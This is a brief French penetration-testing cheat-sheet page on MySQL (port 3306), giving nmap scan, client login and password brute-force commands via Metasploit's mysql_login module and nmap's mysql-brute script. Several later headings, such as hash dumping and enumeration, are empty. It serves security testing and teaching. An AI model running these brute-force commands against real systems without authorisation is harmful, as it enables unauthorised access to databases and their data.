🔡MySQL - port 3306

Scan

$ nmap -sV -p3306 <target IP>

Connexion

$ mysql -h <host IP> -u <username> -p

Bruteforce

Avec metasploit:

msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit

Avec nmap:

nmap -p3306 --script=mysql-brute --script-args userdb=/root/Desktop/user.txt, passdb=/root/Desktop/pass.txt <target IP>

Dump schema

Dump hash

Avec metasploit:

Avec nmap:

Répertoires modifiables

Enumeration des fichiers

Enumeration des utilisateurs

Enumeration des bases de données

Mis à jour

Ce contenu vous a-t-il été utile ?